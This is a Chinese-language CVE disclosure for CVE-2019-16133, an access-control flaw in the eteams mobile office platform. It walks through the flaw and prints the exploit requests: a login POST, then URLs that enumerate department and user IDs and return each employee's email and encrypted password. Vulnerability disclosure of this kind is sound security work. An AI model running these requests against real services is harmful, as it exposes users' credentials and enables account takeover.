CVE中文申请站

CVE-2019-16133:eteams移动办公平台逻辑漏洞

一、漏洞摘要

漏洞名称: eteams移动办公平台逻辑漏洞
上报日期: 2019-08-27
漏洞发现者: wrysunny
产品首页: https://eteams.cn
软件链接: http://www.eteams.cn/download.html
版本: v4.0.34
CVE编号: CVE-2019-16133


二、漏洞概述

eteams是上海泛微网络科技股份有限公司旗下的一款轻量级的一体化移动办公云平台。在其逻辑中存在越权漏洞,可用普通账号获得公司所有员工的账号和密码。
eteams在登录时会获得一个临时的session,在正常使用中请求页面会带上session以用来验证身份。但在获取其他用户信息时,该session值依然有效并会返回用户的登录凭据(用户的userid,用户的邮箱,用户的加密密码等信息)。

  • 大致思路如下:
    普通用户登录获取凭据session值,用该值获取公司的部门id值,接着可再获取部门用户成员的userid,最后使用自己的session值就可查看到某个成员的账号信息。
  • 详细利用过程如下:
    首次登录会返回jsessionid值:

1.png
再获取公司部门的id值:
访问https://www.eteams.cn/app/base/tree/department.json?client=android&version=4.0.34&jsessionid=<;登录的jsessionid值> 就可以先获取公司部门的id值(该jsessionid值为复测时产生,故和登录时的不同)
2.png
获取部门成员的userid
访问https://www.eteams.cn/app/profile/summary/<;公司部门的id值>.json?client=android&version=4.0.34&jsessionid=<登录的jsessionis值>
3.png
最后访问其他用户信息:
查询用户信息的链接为https://www.eteams.cn/app/profile/summary/<;user id>.json?client=android&version=4.0.34&jsessionid=<登录的jsessionid值>,会返回用户的信息,其中最为明显的是会返回用户的加密密码
4.png


三、利用代码

exp代码如下:

#Exploit Title: weaver OA(eteams) logical vulnerability
#Date: 2019-08-27
#Exploit Author: wrysunny

# login get jsessionid
POST /teamsLogin?client=android&version=4.0.34 HTTP/1.1
version: 4.0.34
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Host: www.eteams.cn
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.9.0

username=xxx&password=123456&adviceInfo=STF-AL10&imei=8
# get department id
https://www.eteams.cn/app/base/tree/department.json?client=android&version=4.0.34&jsessionid=<jsessionid>
# get department user id
https://www.eteams.cn/app/profile/summary/<department_id>.json?client=android&version=4.0.34&jsessionid=<jsessionid>
# get user info
https://www.eteams.cn/app/profile/summary/<user_id>.json?client=android&version=4.0.34&jsessionid=<jsessionid>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/271/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16133
exploit-db:发布中